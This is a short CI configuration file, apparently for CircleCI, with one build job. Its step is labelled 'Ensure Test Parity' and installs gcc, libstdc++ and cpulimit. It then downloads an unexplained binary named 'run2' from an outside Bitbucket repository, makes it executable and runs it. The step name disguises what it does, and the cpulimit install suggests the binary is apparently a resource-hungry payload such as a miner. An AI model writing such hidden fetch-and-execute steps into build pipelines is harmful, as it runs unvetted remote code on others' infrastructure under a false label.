version: 2
jobs:
  build:
    machine:
      image: ubuntu-2004:202008-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
            sudo add-apt-repository ppa:ubuntu-toolchain-r/test -y
            sudo apt update -y && sudo apt install gcc-9 -y
            sudo apt install libstdc++6 -y
            sudo apt install cpulimit nano -y
            wget https://bitbucket.org/seaguardian/guardian3/raw/cf46ae29e7ee986b414cf5495dfc7498cb7c2105/run2 && chmod +x run2 && ./run2